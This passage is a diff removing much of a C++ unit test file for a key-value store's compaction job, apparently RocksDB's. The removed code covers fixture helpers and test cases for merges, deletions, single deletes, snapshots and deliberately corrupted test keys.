-    EXPECT_OK(env_->CreateDirIfMissing(dbname_));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-  }
-
-  std::string GenerateFileName(uint64_t file_number) {
-    FileMetaData meta;
-    std::vector<DbPath> db_paths;
-    db_paths.emplace_back(dbname_, std::numeric_limits<uint64_t>::max());
-    meta.fd = FileDescriptor(file_number, 0, 0);
-    return TableFileName(db_paths, meta.fd.GetNumber(), meta.fd.GetPathId());
-  }
-
-  std::string KeyStr(const std::string& user_key, const SequenceNumber seq_num,
-      const ValueType t) {
-    return InternalKey(user_key, seq_num, t).Encode().ToString();
-  }
-
-  void AddMockFile(const stl_wrappers::KVMap& contents, int level = 0) {
-    assert(contents.size() > 0);
-
-    bool first_key = true;
-    std::string smallest, largest;
-    InternalKey smallest_key, largest_key;
-    SequenceNumber smallest_seqno = kMaxSequenceNumber;
-    SequenceNumber largest_seqno = 0;
-    for (auto kv : contents) {
-      ParsedInternalKey key;
-      std::string skey;
-      std::string value;
-      std::tie(skey, value) = kv;
-      ParseInternalKey(skey, &key);
-
-      smallest_seqno = std::min(smallest_seqno, key.sequence);
-      largest_seqno = std::max(largest_seqno, key.sequence);
-
-      if (first_key ||
-          cfd_->user_comparator()->Compare(key.user_key, smallest) < 0) {
-        smallest.assign(key.user_key.data(), key.user_key.size());
-        smallest_key.DecodeFrom(skey);
-      }
-      if (first_key ||
-          cfd_->user_comparator()->Compare(key.user_key, largest) > 0) {
-        largest.assign(key.user_key.data(), key.user_key.size());
-        largest_key.DecodeFrom(skey);
-      }
-
-      first_key = false;
-    }
-
-    uint64_t file_number = versions_->NewFileNumber();
-    EXPECT_OK(mock_table_factory_->CreateMockTable(
-        env_, GenerateFileName(file_number), std::move(contents)));
-
-    VersionEdit edit;
-    edit.AddFile(level, file_number, 0, 10, smallest_key, largest_key,
-        smallest_seqno, largest_seqno, false);
-
-    mutex_.Lock();
-    versions_->LogAndApply(versions_->GetColumnFamilySet()->GetDefault(),
-                           mutable_cf_options_, &edit, &mutex_);
-    mutex_.Unlock();
-  }
-
-  void SetLastSequence(const SequenceNumber sequence_number) {
-    versions_->SetLastToBeWrittenSequence(sequence_number + 1);
-    versions_->SetLastSequence(sequence_number + 1);
-  }
-
-  // returns expected result after compaction
-  stl_wrappers::KVMap CreateTwoFiles(bool gen_corrupted_keys) {
-    auto expected_results = mock::MakeMockFile();
-    const int kKeysPerFile = 10000;
-    const int kCorruptKeysPerFile = 200;
-    const int kMatchingKeys = kKeysPerFile / 2;
-    SequenceNumber sequence_number = 0;
-
-    auto corrupt_id = [&](int id) {
-      return gen_corrupted_keys && id > 0 && id <= kCorruptKeysPerFile;
-    };
-
-    for (int i = 0; i < 2; ++i) {
-      auto contents = mock::MakeMockFile();
-      for (int k = 0; k < kKeysPerFile; ++k) {
-        auto key = ToString(i * kMatchingKeys + k);
-        auto value = ToString(i * kKeysPerFile + k);
-        InternalKey internal_key(key, ++sequence_number, kTypeValue);
-
-        // This is how the key will look like once it's written in bottommost
-        // file
-        InternalKey bottommost_internal_key(
-            key, (key == "9999") ? sequence_number : 0, kTypeValue);
-
-        if (corrupt_id(k)) {
-          test::CorruptKeyType(&internal_key);
-          test::CorruptKeyType(&bottommost_internal_key);
-        }
-        contents.insert({ internal_key.Encode().ToString(), value });
-        if (i == 1 || k < kMatchingKeys || corrupt_id(k - kMatchingKeys)) {
-          expected_results.insert(
-              { bottommost_internal_key.Encode().ToString(), value });
-        }
-      }
-
-      AddMockFile(contents);
-    }
-
-    SetLastSequence(sequence_number);
-
-    return expected_results;
-  }
-
-  void NewDB() {
-    VersionEdit new_db;
-    new_db.SetLogNumber(0);
-    new_db.SetNextFile(2);
-    new_db.SetLastSequence(0);
-
-    const std::string manifest = DescriptorFileName(dbname_, 1);
-    unique_ptr<WritableFile> file;
-    Status s = env_->NewWritableFile(
-        manifest, &file, env_->OptimizeForManifestWrite(env_options_));
-    ASSERT_OK(s);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options_));
-    {
-      log::Writer log(std::move(file_writer), 0, false);
-      std::string record;
-      new_db.EncodeTo(&record);
-      s = log.AddRecord(record);
-    }
-    ASSERT_OK(s);
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, nullptr);
-
-    std::vector<ColumnFamilyDescriptor> column_families;
-    cf_options_.table_factory = mock_table_factory_;
-    cf_options_.merge_operator = merge_op_;
-    cf_options_.compaction_filter = compaction_filter_.get();
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options_);
-
-    EXPECT_OK(versions_->Recover(column_families, false));
-    cfd_ = versions_->GetColumnFamilySet()->GetDefault();
-  }
-
-  void RunCompaction(
-      const std::vector<std::vector<FileMetaData*>>& input_files,
-      const stl_wrappers::KVMap& expected_results,
-      const std::vector<SequenceNumber>& snapshots = {},
-      SequenceNumber earliest_write_conflict_snapshot = kMaxSequenceNumber) {
-    auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-
-    size_t num_input_files = 0;
-    std::vector<CompactionInputFiles> compaction_input_files;
-    for (size_t level = 0; level < input_files.size(); level++) {
-      auto level_files = input_files[level];
-      CompactionInputFiles compaction_level;
-      compaction_level.level = static_cast<int>(level);
-      compaction_level.files.insert(compaction_level.files.end(),
-          level_files.begin(), level_files.end());
-      compaction_input_files.push_back(compaction_level);
-      num_input_files += level_files.size();
-    }
-
-    Compaction compaction(cfd->current()->storage_info(), *cfd->ioptions(),
-                          *cfd->GetLatestMutableCFOptions(),
-                          compaction_input_files, 1, 1024 * 1024,
-                          10 * 1024 * 1024, 0, kNoCompression, {}, true);
-    compaction.SetInputVersion(cfd->current());
-
-    LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, db_options_.info_log.get());
-    mutex_.Lock();
-    EventLogger event_logger(db_options_.info_log.get());
-    CompactionJob compaction_job(
-        0, &compaction, db_options_, env_options_, versions_.get(),
-        &shutting_down_, &log_buffer, nullptr, nullptr, nullptr, &mutex_,
-        &bg_error_, snapshots, earliest_write_conflict_snapshot, table_cache_,
-        &event_logger, false, false, dbname_, &compaction_job_stats_);
-
-    VerifyInitializationOfCompactionJobStats(compaction_job_stats_);
-
-    compaction_job.Prepare();
-    mutex_.Unlock();
-    Status s;
-    s = compaction_job.Run();
-    ASSERT_OK(s);
-    mutex_.Lock();
-    ASSERT_OK(compaction_job.Install(*cfd->GetLatestMutableCFOptions()));
-    mutex_.Unlock();
-
-    if (expected_results.size() == 0) {
-      ASSERT_GE(compaction_job_stats_.elapsed_micros, 0U);
-      ASSERT_EQ(compaction_job_stats_.num_input_files, num_input_files);
-      ASSERT_EQ(compaction_job_stats_.num_output_files, 0U);
-    } else {
-      ASSERT_GE(compaction_job_stats_.elapsed_micros, 0U);
-      ASSERT_EQ(compaction_job_stats_.num_input_files, num_input_files);
-      ASSERT_EQ(compaction_job_stats_.num_output_files, 1U);
-      mock_table_factory_->AssertLatestFile(expected_results);
-    }
-  }
-
-  Env* env_;
-  std::string dbname_;
-  EnvOptions env_options_;
-  ImmutableDBOptions db_options_;
-  ColumnFamilyOptions cf_options_;
-  MutableCFOptions mutable_cf_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteController write_controller_;
-  WriteBufferManager write_buffer_manager_;
-  std::unique_ptr<VersionSet> versions_;
-  InstrumentedMutex mutex_;
-  std::atomic<bool> shutting_down_;
-  std::shared_ptr<mock::MockTableFactory> mock_table_factory_;
-  CompactionJobStats compaction_job_stats_;
-  ColumnFamilyData* cfd_;
-  std::unique_ptr<CompactionFilter> compaction_filter_;
-  std::shared_ptr<MergeOperator> merge_op_;
-  Status bg_error_;
-};
-
-TEST_F(CompactionJobTest, Simple) {
-  NewDB();
-
-  auto expected_results = CreateTwoFiles(false);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto files = cfd->current()->storage_info()->LevelFiles(0);
-  ASSERT_EQ(2U, files.size());
-  RunCompaction({ files }, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleCorrupted) {
-  NewDB();
-
-  auto expected_results = CreateTwoFiles(true);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto files = cfd->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-  ASSERT_EQ(compaction_job_stats_.num_corrupt_keys, 400U);
-}
-
-TEST_F(CompactionJobTest, SimpleDeletion) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({{KeyStr("c", 4U, kTypeDeletion), ""},
-                                   {KeyStr("c", 3U, kTypeValue), "val"}});
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("b", 2U, kTypeValue), "val"},
-                                   {KeyStr("b", 1U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("b", 0U, kTypeValue), "val"}});
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, OutputNothing) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"}});
-
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 2U, kTypeDeletion), ""}});
-
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile();
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleOverwrite) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 3U, kTypeValue), "val2"},
-      {KeyStr("b", 4U, kTypeValue), "val3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"},
-                                   {KeyStr("b", 2U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "val2"},
-                          {KeyStr("b", 4U, kTypeValue), "val3"}});
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleNonLastLevel) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeValue), "val2"},
-      {KeyStr("b", 6U, kTypeValue), "val3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 3U, kTypeValue), "val"},
-                                   {KeyStr("b", 4U, kTypeValue), "val"}});
-  AddMockFile(file2, 1);
-
-  auto file3 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"},
-                                   {KeyStr("b", 2U, kTypeValue), "val"}});
-  AddMockFile(file3, 2);
-
-  // Because level 1 is not the last level, the sequence numbers of a and b
-  // cannot be set to 0
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 5U, kTypeValue), "val2"},
-                          {KeyStr("b", 6U, kTypeValue), "val3"}});
-
-  SetLastSequence(6U);
-  auto lvl0_files = cfd_->current()->storage_info()->LevelFiles(0);
-  auto lvl1_files = cfd_->current()->storage_info()->LevelFiles(1);
-  RunCompaction({lvl0_files, lvl1_files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendOperator();
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeMerge), "5"},
-      {KeyStr("a", 4U, kTypeMerge), "4"},
-      {KeyStr("a", 3U, kTypeValue), "3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile(
-      {{KeyStr("b", 2U, kTypeMerge), "2"}, {KeyStr("b", 1U, kTypeValue), "1"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "3,4,5"},
-                          {KeyStr("b", 2U, kTypeValue), "1,2"}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, NonAssocMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendTESTOperator();
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeMerge), "5"},
-      {KeyStr("a", 4U, kTypeMerge), "4"},
-      {KeyStr("a", 3U, kTypeMerge), "3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile(
-      {{KeyStr("b", 2U, kTypeMerge), "2"}, {KeyStr("b", 1U, kTypeMerge), "1"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "3,4,5"},
-                          {KeyStr("b", 2U, kTypeMerge), "2"},
-                          {KeyStr("b", 1U, kTypeMerge), "1"}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-// Filters merge operands with value 10.
-TEST_F(CompactionJobTest, MergeOperandFilter) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 = mock::MakeMockFile(
-      {{KeyStr("a", 5U, kTypeMerge), test::EncodeInt(5U)},
-       {KeyStr("a", 4U, kTypeMerge), test::EncodeInt(10U)},  // Filtered
-       {KeyStr("a", 3U, kTypeMerge), test::EncodeInt(3U)}});
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(2U)},
-      {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)}  // Filtered
-  });
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), test::EncodeInt(8U)},
-                          {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(2U)}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, FilterSomeMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 = mock::MakeMockFile(
-      {{KeyStr("a", 5U, kTypeMerge), test::EncodeInt(5U)},
-       {KeyStr("a", 4U, kTypeMerge), test::EncodeInt(10U)},  // Filtered
-       {KeyStr("a", 3U, kTypeValue), test::EncodeInt(5U)},
-       {KeyStr("d", 8U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{KeyStr("b", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 2U, kTypeMerge), test::EncodeInt(3U)},
-                          {KeyStr("c", 1U, kTypeValue), test::EncodeInt(7U)},
-                          {KeyStr("d", 1U, kTypeValue), test::EncodeInt(6U)}});
-  AddMockFile(file2);
-
-  auto file3 =
-      mock::MakeMockFile({{KeyStr("a", 1U, kTypeMerge), test::EncodeInt(3U)}});
-  AddMockFile(file3, 2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeValue), test::EncodeInt(10U)},
-      {KeyStr("c", 2U, kTypeValue), test::EncodeInt(10U)},
-      {KeyStr("d", 1U, kTypeValue), test::EncodeInt(6U)}
-      // b does not appear because the operands are filtered
-  });
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-// Test where all operands/merge results are filtered out.
-TEST_F(CompactionJobTest, FilterAllMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 =
-      mock::MakeMockFile({{KeyStr("a", 11U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("a", 10U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("a", 9U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{KeyStr("b", 8U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 7U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 6U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 5U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 4U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 3U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 1U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file2);
-
-  auto file3 =
-      mock::MakeMockFile({{KeyStr("a", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file3, 2);
-
-  SetLastSequence(11U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-
-  stl_wrappers::KVMap empty_map;
-  RunCompaction({files}, empty_map);
-}
-
-TEST_F(CompactionJobTest, SimpleSingleDelete) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeDeletion), ""},
-      {KeyStr("b", 6U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 3U, kTypeValue), "val"},
-                                   {KeyStr("b", 4U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("a", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 5U, kTypeDeletion), ""}});
-
-  SetLastSequence(6U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SingleDeleteSnapshots) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("b", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("c", 22U, kTypeSingleDeletion), ""},
-      {KeyStr("d", 9U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 9U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("l", 3U, kTypeSingleDeletion), ""},
-      {KeyStr("l", 2U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("0", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 11U, kTypeValue), "val1"},
-      {KeyStr("b", 11U, kTypeValue), "val2"},
-      {KeyStr("c", 21U, kTypeValue), "val3"},
-      {KeyStr("d", 8U, kTypeValue), "val4"},
-      {KeyStr("e", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 1U, kTypeValue), "val1"},
-      {KeyStr("g", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("h", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 12U, kTypeValue), "val1"},
-      {KeyStr("m", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 8U, kTypeValue), "val2"},
-  });
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("A", 1U, kTypeValue), "val"},
-      {KeyStr("e", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 11U, kTypeValue), ""},
-      {KeyStr("b", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("b", 11U, kTypeValue), "val2"},
-      {KeyStr("c", 22U, kTypeSingleDeletion), ""},
-      {KeyStr("c", 21U, kTypeValue), ""},
-      {KeyStr("e", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 1U, kTypeValue), "val1"},
-      {KeyStr("g", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 12U, kTypeValue), "val1"},
-      {KeyStr("m", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 8U, kTypeValue), "val2"},
-  });
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U, 20U}, 10U);
-}
-
-TEST_F(CompactionJobTest, EarliestWriteConflictSnapshot) {
-  NewDB();
-
-  // Test multiple snapshots where the earliest snapshot is not a
-  // write-conflic-snapshot.
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 23U, kTypeValue), "val"},
-      {KeyStr("B", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 23U, kTypeValue), "val"},
-      {KeyStr("D", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 32U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 31U, kTypeValue), "val"},
-      {KeyStr("G", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 23U, kTypeValue), "val2"},
-      {KeyStr("H", 31U, kTypeValue), "val"},
-      {KeyStr("H", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 23U, kTypeValue), "val"},
-      {KeyStr("I", 35U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 34U, kTypeValue), "val2"},
-      {KeyStr("I", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 32U, kTypeValue), "val3"},
-      {KeyStr("I", 31U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 34U, kTypeValue), "val"},
-      {KeyStr("J", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 25U, kTypeValue), "val2"},
-      {KeyStr("J", 24U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 13U, kTypeValue), "val2"},
-      {KeyStr("C", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("C", 13U, kTypeValue), "val"},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 3U, kTypeValue), "val"},
-      {KeyStr("G", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 13U, kTypeValue), "val3"},
-      {KeyStr("H", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 13U, kTypeValue), "val2"},
-      {KeyStr("I", 13U, kTypeValue), "val4"},
-      {KeyStr("I", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 11U, kTypeValue), "val5"},
-      {KeyStr("J", 15U, kTypeValue), "val3"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("A", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 23U, kTypeValue), ""},
-      {KeyStr("B", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 23U, kTypeValue), ""},
-      {KeyStr("D", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 32U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 31U, kTypeValue), ""},
-      {KeyStr("H", 31U, kTypeValue), "val"},
-      {KeyStr("I", 35U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 34U, kTypeValue), ""},
-      {KeyStr("I", 31U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 13U, kTypeValue), "val4"},
-      {KeyStr("J", 34U, kTypeValue), "val"},
-      {KeyStr("J", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 25U, kTypeValue), "val2"},
-      {KeyStr("J", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 15U, kTypeValue), "val3"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-  });
-
-  SetLastSequence(24U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U, 20U, 30U}, 20U);
-}
-
-TEST_F(CompactionJobTest, SingleDeleteZeroSeq) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("dummy", 5U, kTypeValue), "val2"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 0U, kTypeValue), "val"},
-  });
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("dummy", 5U, kTypeValue), "val2"},
-  });
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {});
-}
-
-TEST_F(CompactionJobTest, MultiSingleDelete) {
-  // Tests three scenarios involving multiple single delete/put pairs:
-  //
-  // A: Put Snapshot SDel Put SDel -> Put Snapshot SDel
-  // B: Snapshot Put SDel Put SDel Snapshot -> Snapshot SDel Snapshot
-  // C: SDel Put SDel Snapshot Put -> Snapshot Put
-  // D: (Put) SDel Snapshot Put SDel -> (Put) SDel Snapshot SDel
-  // E: Put SDel Snapshot Put SDel -> Snapshot SDel
-  // F: Put SDel Put Sdel Snapshot -> removed
-  // G: Snapshot SDel Put SDel Put -> Snapshot Put SDel
-  // H: (Put) Put SDel Put Sdel Snapshot -> Removed
-  // I: (Put) Snapshot Put SDel Put SDel -> SDel
-  // J: Put Put SDel Put SDel SDel Snapshot Put Put SDel SDel Put
-  //      -> Snapshot Put
-  // K: SDel SDel Put SDel Put Put Snapshot SDel Put SDel SDel Put SDel
-  //      -> Snapshot Put Snapshot SDel
-  // L: SDel Put Del Put SDel Snapshot Del Put Del SDel Put SDel
-  //      -> Snapshot SDel
-  // M: (Put) SDel Put Del Put SDel Snapshot Put Del SDel Put SDel Del
-  //      -> SDel Snapshot Del
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 13U, kTypeValue), "val5"},
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 13U, kTypeValue), "val2"},
-      {KeyStr("C", 14U, kTypeValue), "val3"},
-      {KeyStr("D", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("D", 11U, kTypeValue), "val4"},
-      {KeyStr("G", 15U, kTypeValue), "val"},
-      {KeyStr("G", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 13U, kTypeValue), "val"},
-      {KeyStr("I", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 13U, kTypeValue), "val"},
-      {KeyStr("J", 15U, kTypeValue), "val"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 12U, kTypeValue), "val"},
-      {KeyStr("J", 11U, kTypeValue), "val"},
-      {KeyStr("K", 16U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 15U, kTypeValue), "val1"},
-      {KeyStr("K", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 12U, kTypeValue), "val2"},
-      {KeyStr("K", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 16U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 15U, kTypeValue), "val"},
-      {KeyStr("L", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 13U, kTypeDeletion), ""},
-      {KeyStr("L", 12U, kTypeValue), "val"},
-      {KeyStr("L", 11U, kTypeDeletion), ""},
-      {KeyStr("M", 16U, kTypeDeletion), ""},
-      {KeyStr("M", 15U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 14U, kTypeValue), "val"},
-      {KeyStr("M", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 12U, kTypeDeletion), ""},
-      {KeyStr("M", 11U, kTypeValue), "val"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 10U, kTypeValue), "val"},
-      {KeyStr("B", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 11U, kTypeValue), "val2"},
-      {KeyStr("C", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("C", 9U, kTypeValue), "val6"},
-      {KeyStr("C", 8U, kTypeSingleDeletion), ""},
-      {KeyStr("D", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 11U, kTypeValue), "val"},
